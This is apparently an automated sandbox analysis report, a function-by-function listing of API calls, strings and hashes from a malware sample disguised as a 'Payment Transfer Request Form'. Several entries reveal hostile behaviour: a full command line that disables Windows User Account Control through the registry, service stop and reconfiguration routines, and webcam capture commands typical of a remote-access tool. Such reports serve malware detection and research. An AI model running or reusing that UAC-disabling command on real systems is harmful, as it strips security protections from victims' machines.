                                              Function 0040F8B7 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040F8C4
                                              • int.LIBCPMT ref: 0040F8D7
                                                • Part of subcall function 0040CAE9: std::_Lockit::_Lockit.LIBCPMT ref: 0040CAFA
                                                • Part of subcall function 0040CAE9: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CB14
                                              • std::_Facet_Register.LIBCPMT ref: 0040F917
                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040F920
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040F93E
                                              • __Init_thread_footer.LIBCMT ref: 0040F97F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                              • String ID:
                                              • API String ID: 3815856325-0
                                              • Opcode ID: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                              • Instruction ID: 3bb9722abb9e04fd13c8d4025e7ce1c878c76566b3017ce531706a3e1b7c3414
                                              • Opcode Fuzzy Hash: 296aa1fc45bd8a97e11338d30c2ad026eda8063a32206ad78c4166fd1b77079b
                                              • Instruction Fuzzy Hash: 90212232900104EBCB24EBA9E94699E7378AB08324F20017FF844B72D1DB389F458BD9
                                              Function 00418C2E Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C3E
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,00418344,00000000), ref: 00418C52
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418C5F
                                              • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00418344,00000000), ref: 00418C94
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA6
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,00418344,00000000), ref: 00418CA9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                              • String ID:
                                              • API String ID: 493672254-0
                                              • Opcode ID: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                              • Instruction ID: 151ede47f5a01f66990efdacd58a0b59027112db6305451f0336687f4909308b
                                              • Opcode Fuzzy Hash: 6b3aada76383092df42fd9d8378ae16ca6440a91692c2fe76f90724c69c65514
                                              • Instruction Fuzzy Hash: A20149711862183AE6108B389C4EEBB3A6CDB42771F14032FF925A32D1EE68CD4185F9
                                              Function 00445725 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                              • _free.LIBCMT ref: 0044575C
                                              • _free.LIBCMT ref: 00445784
                                              • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                                              • SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                              • _abort.LIBCMT ref: 004457A3
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                              • Instruction ID: 2afc6a99b93033dbed13f8def56e2284daf42193b39b630cfab03248b002a5f8
                                              • Opcode Fuzzy Hash: 2164e89f114e7cf86b97a0d05c6cee2e89ce7be6ffa074a4cf04242e0fee9013
                                              • Instruction Fuzzy Hash: 6EF0FE35100F0067FA117B367C8AB2F1A695FC2B2AF21013BF419D6293EE3DC902452D
                                              Function 00418A5C Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,004185D9,00000000), ref: 00418A6B
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004185D9,00000000), ref: 00418A7F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418A8C
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004185D9,00000000), ref: 00418A9B
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AAD
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004185D9,00000000), ref: 00418AB0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                              • Instruction ID: 4afe7732e2fa81f36ccf108e41ed7890102f29a09d0e479adccf976045b68e04
                                              • Opcode Fuzzy Hash: f9d93c7612eed7e1ddf8c3953865d04e5265de3587757247bbfd6a1c47877660
                                              • Instruction Fuzzy Hash: A4F0C2315013186BD210EBA5DC89EBF3BACDF45B96B41002BFD0993192DF38CD4689E9
                                              Function 00418B60 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,00418559,00000000), ref: 00418B6F
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00418559,00000000), ref: 00418B83
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418B90
                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00418559,00000000), ref: 00418B9F
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB1
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00418559,00000000), ref: 00418BB4
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                              • Instruction ID: 20460b91a854b5e3c53015269073f2e928c2deccd9acf6b4d89527a320d4dccf
                                              • Opcode Fuzzy Hash: 027b45ec19db43cd3e6d09ceb5389eefa79acdbdadc7d59ed190380558829436
                                              • Instruction Fuzzy Hash: 22F0C2715402186BD210EB65DC89EBF3BACDB45B52B81006AFE09A3192DE38DD4589E9
                                              Function 00418BC7 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,004184D9,00000000), ref: 00418BD6
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004184D9,00000000), ref: 00418BEA
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418BF7
                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004184D9,00000000), ref: 00418C06
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C18
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004184D9,00000000), ref: 00418C1B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                              • Instruction ID: 1da220ff3ffe1d32b0df5c47a21bcd1adf2661b27de4fa42f8fed5365a22baa8
                                              • Opcode Fuzzy Hash: 60f77fd359bc8166b0f1f63c621f75235c8633bea2de10f026708dad38e6f72c
                                              • Instruction Fuzzy Hash: 32F0C2715012186BD210EB65EC89DBF3BACDB45B51B41002AFE0993192DF38CD4589F9
                                              Function 0040966D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409745), ref: 004096A3
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409745), ref: 004096B2
                                              • Sleep.KERNEL32(00002710,?,?,?,00409745), ref: 004096DF
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00409745), ref: 004096E6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleSizeSleep
                                              • String ID: h G
                                              • API String ID: 1958988193-3300504347
                                              • Opcode ID: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                              • Instruction ID: 1483d32ec36d41576822df3093d1b75ffc22edec2a146082987510034e162158
                                              • Opcode Fuzzy Hash: 2165585e5b18e3410dae2497746dd606356f3a02818af73040aae92c32689789
                                              • Instruction Fuzzy Hash: 24113D70201380ABD7316B749D99A2F3A9BB746304F44087EF281636D3C67D5C44C32E
                                              Function 0041B2C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegisterClassExA.USER32(00000030), ref: 0041B310
                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                              • GetLastError.KERNEL32 ref: 0041B335
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ClassCreateErrorLastRegisterWindow
                                              • String ID: 0$MsgWindowClass
                                              • API String ID: 2877667751-2410386613
                                              • Opcode ID: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                              • Instruction ID: 33db8f89e50e9671cec9701a72200cc03bcb20702a276687bfdd99081a41ce18
                                              • Opcode Fuzzy Hash: 5c8849b15fa1cc9467c1d7fb15406a30d7545ffe8e7388a5e40320623bb372a5
                                              • Instruction Fuzzy Hash: 1F0125B190031CABDB10DFE5EC849EFBBBCFB08355F40052AF810A2250E77599048AA4
                                              Function 00437603 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043761A
                                                • Part of subcall function 00437C52: ___AdjustPointer.LIBCMT ref: 00437C9C
                                              • _UnwindNestedFrames.LIBCMT ref: 00437631
                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00437643
                                              • CallCatchBlock.LIBVCRUNTIME ref: 00437667
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                              • String ID: /zC
                                              • API String ID: 2633735394-4132788633
                                              • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                              • Instruction ID: d669bc69f5b2d8c9fbf55978af89ff33433ac2085b506f133949dc977f569c90
                                              • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                              • Instruction Fuzzy Hash: 44012D72004508BBCF225F56CC42EDA3BBAEF4C764F15501AFA9861220C33AE861DF98
                                              Function 0041739D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSystemMetrics.USER32(0000004C), ref: 004173AA
                                              • GetSystemMetrics.USER32(0000004D), ref: 004173B0
                                              • GetSystemMetrics.USER32(0000004E), ref: 004173B6
                                              • GetSystemMetrics.USER32(0000004F), ref: 004173BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MetricsSystem
                                              • String ID: ]tA
                                              • API String ID: 4116985748-3517819141
                                              • Opcode ID: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                              • Instruction ID: 3cbdadbf3de93f5eefc1923f71e525f4be7d9c38d0567e5d5edaddbebabc810f
                                              • Opcode Fuzzy Hash: 812a9219b2c6697e1b7e6c0967c7113de32af3875f372bd592213eda7148f6bd
                                              • Instruction Fuzzy Hash: 64F0AFB1B043254BD700EA7A8C41A6FAAE59BD4274F11443FFA09C7282EEB8DC458B94
                                              Function 0040E501 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                              Strings
                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                              • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreateProcess
                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                              • API String ID: 2922976086-4183131282
                                              • Opcode ID: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                              • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                              • Opcode Fuzzy Hash: 5cb763d495b165fc4f9c66d013102bd94a78ddd016aca5e3dc924e3fee2ecf0f
                                              • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5
                                              Function 0044083A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 0044085A
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044086D
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,004407EB,00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002), ref: 00440890
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                              • Instruction ID: 0a8d3f567fe41ef9be558500660f8c42ae883db5e601ee7dbbda2c1d2cd30ed9
                                              • Opcode Fuzzy Hash: cfbbdf30ec96b6666769d195f1efe458a00f065bb439fa98bb073361271b6784
                                              • Instruction Fuzzy Hash: EAF0A431900618BBDB10AF61DC09BAEBFB4DB04756F510275F905A2261CB74CE54CA98
                                              Function 004050C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00471E90,00404E5A,00000001,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405100
                                              • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 0040510C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405117
                                              • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000), ref: 00405120
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              Strings
                                              • Connection KeepAlive | Disabled, xrefs: 004050D9
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                              • String ID: Connection KeepAlive | Disabled
                                              • API String ID: 2993684571-3818284553
                                              • Opcode ID: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                              • Instruction ID: 9f72672606b7a98fb4f6c5586ee23e87f0057564a74405461857646c77684129
                                              • Opcode Fuzzy Hash: 225cf815540c87da9bddac79f5b913ec4e7dd3a96093c31c561b7671f502e72f
                                              • Instruction Fuzzy Hash: 73F09671D047007FEB1037759D0AA6B7F98DB02315F44096EF882526E1D5B988509B5A
                                              Function 00418D76 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00418DA8
                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00418DB6
                                              • Sleep.KERNEL32(00002710), ref: 00418DBD
                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00418DC6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                              • String ID: Alarm triggered
                                              • API String ID: 614609389-2816303416
                                              • Opcode ID: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                              • Instruction ID: 312fa8acbc24107594bc9953998d05cc744500d2263fe9839a2dc32143519282
                                              • Opcode Fuzzy Hash: bdf6e914fbef22af66a0bd792b19461622f07135ad8277a1fc3addc14a55c3ce
                                              • Instruction Fuzzy Hash: 9EE01226E4026037A510376A6D0FC6F2D2DDBD3B6274501AFFA04571D2D9A4080186FF
                                              Function 0043BB4A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                              • Instruction ID: 08a5b5d7c592992a36ca4e715a0fda7f3efcfcd9ac9fa05da90acde50f0064fb
                                              • Opcode Fuzzy Hash: 0ee00742f353d3b6c360b2e24851711a1429195aca157381f7858ce70f5acd61
                                              • Instruction Fuzzy Hash: C471C3319002169BCB21CF55C884BFFBB75EF99320F24622BEA5167241DB788D41CBE9
                                              Function 00404351 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 206sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000,?), ref: 004044A4
                                                • Part of subcall function 004045E7: __EH_prolog.LIBCMT ref: 004045EC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologSleep
                                              • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                              • API String ID: 3469354165-3547787478
                                              • Opcode ID: 4ee543910f48755f5c288a5275da295851a2a7aff528ce32474725018741fa24
                                              • Instruction ID: 7794b0ea9bf29785644917a3a4e5658b539d561772896ef264e5995737b90c85
                                              • Opcode Fuzzy Hash: 4ee543910f48755f5c288a5275da295851a2a7aff528ce32474725018741fa24
                                              • Instruction Fuzzy Hash: 5951E8B1B0420167C614BB769D5AA6E3795ABC0744F00053FFA45A77E2EF7C8D09C29E
                                              Function 0044220D Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              • _free.LIBCMT ref: 00442318
                                              • _free.LIBCMT ref: 0044232F
                                              • _free.LIBCMT ref: 0044234E
                                              • _free.LIBCMT ref: 00442369
                                              • _free.LIBCMT ref: 00442380
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$AllocateHeap
                                              • String ID:
                                              • API String ID: 3033488037-0
                                              • Opcode ID: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                              • Instruction ID: f6524bd8b7bf53f5b45239f2df66d8239dbe938cd5ee0330fa6954bf91cd2c46
                                              • Opcode Fuzzy Hash: 68d3d4ca8a647a007ad94700598122f23d06d752802edf7745cc1232d3d9ba81
                                              • Instruction Fuzzy Hash: 2951C331A00704AFEB20DF6AC941A6A77F4FF49724F54466EF809DB250E7B9DA018B48
                                              Function 00446894 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                              • _free.LIBCMT ref: 004468EC
                                                • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                                • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                              • _free.LIBCMT ref: 00446AB8
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                              • String ID:
                                              • API String ID: 1286116820-0
                                              • Opcode ID: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                              • Instruction ID: 7fd05a225221f517daf6149bd07272def0d2f8fc9e30777fa7538f83a84e5ba5
                                              • Opcode Fuzzy Hash: 13e783ce7238224165918a71ff61bbb040dde026da6db54b448d3cbd4e0f0125
                                              • Instruction Fuzzy Hash: 63511DB1900205ABEB10EF65DC8196A77BCEF42714B12027FE454A7291EBB89E44CB5E
                                              Function 004412F9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                              • Instruction ID: cd63c3b426f476a3995244c06b7e284d95fcad26de8669326c9f329b52a78418
                                              • Opcode Fuzzy Hash: 76d0ae20e321c1f8d33a0e61d3fd8decc26b720c3d8a788f20ca92602b864a36
                                              • Instruction Fuzzy Hash: AE41E132E002049FEB10DF79C981A5EB3F5EF88718F1585AAE915EB351EA74AD41CB84
                                              Function 0044E30C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00439ED1,?,00000000,?,00000001,?,?,00000001,00439ED1,?), ref: 0044E359
                                              • __alloca_probe_16.LIBCMT ref: 0044E391
                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044E3E2
                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00438C3F,?), ref: 0044E3F4
                                              • __freea.LIBCMT ref: 0044E3FD
                                                • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                              • String ID:
                                              • API String ID: 313313983-0
